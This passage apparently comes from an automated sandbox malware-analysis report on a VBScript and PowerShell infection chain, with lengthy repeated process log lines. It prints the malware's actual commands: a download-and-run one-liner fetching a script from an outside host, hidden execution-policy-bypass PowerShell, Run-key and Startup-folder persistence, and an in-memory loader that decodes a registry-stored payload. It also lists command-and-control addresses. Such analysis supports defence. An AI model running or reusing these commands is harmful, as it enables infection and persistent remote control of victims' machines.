Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\wscript.exe Window / User API: threadDelayed 843
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5767
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 748 Thread sleep time: -922337203685477s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 1300 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 2268 Thread sleep count: 843 > 30
Source: C:\Windows\System32\wscript.exe TID: 2268 Thread sleep time: -50580000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 2260 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 1404 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 2712 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 5767 > 30
Source: C:\Windows\System32\wscript.exe TID: 3224 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3356 Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100 Thread sleep time: -922337203685477s >= -60000s
Source: C:\Windows\System32\wscript.exe TID: 3528 Thread sleep time: -60000s >= -60000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: wscript.exe, 0000000A.00000003.1678864821.025AB000.00000004.sdmpBinary or memory string: iRWxIQ0VuQVFJVGFXeGx1UkhLd1ZOTFZWZyINCklmIFBIeWtVanl0a1dwUEVlSXlPYU9NdEpqID0gIkVsSENFbkFRSVRhV3hsdVJIS3dWTkxWVmciIFRoZW4NCkVuZCBJZg0KRm9yIGJGTEdNTEZKRnVBcnJ5Rk5vRE1uWXp2ID0gMTU3NiB0by
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Checks for debuggers (devices)
Source: C:\Windows\System32\mshta.exe File opened: C:\Windows\WinSxS\FileMaps\$$_system32_21f9a9c4a2f8b514.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\mshta.exe System information queried: KernelDebuggerInformation
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Network Connect: 23.105.131.191 5478
Source: C:\Windows\System32\wscript.exe Network Connect: 194.5.98.10 136
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Network Connect: 166.62.121.61 443
Allocates memory in foreign processes
Source: C:\Windows\System32\wscript.exe Memory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000 protect: page read and write
Source: C:\Windows\System32\wscript.exe Memory allocated: unknown base: 50000 protect: page read and write
Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Writes to foreign memory regions
Source: C:\Windows\System32\wscript.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50000
Source: C:\Windows\System32\wscript.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 50020
Source: C:\Windows\System32\wscript.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFD7238
Source: C:\Windows\System32\wscript.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FFDF238
Source: C:\Windows\System32\wscript.exe Memory written: unknown base: 50000
Source: C:\Windows\System32\wscript.exeMemory written: unknown base: 50020
Source: C:\Windows\System32\wscript.exeMemory written: unknown base: 7FFDE238
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','%temp%\microsoft.vbs'); Start '%temp%\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\system32\wscript.exe' 'C:\Users\user\AppData\Roaming\microsoft.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' //B 'C:\Users\user\AppData\Roaming\nUleFczcAh.vbs'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources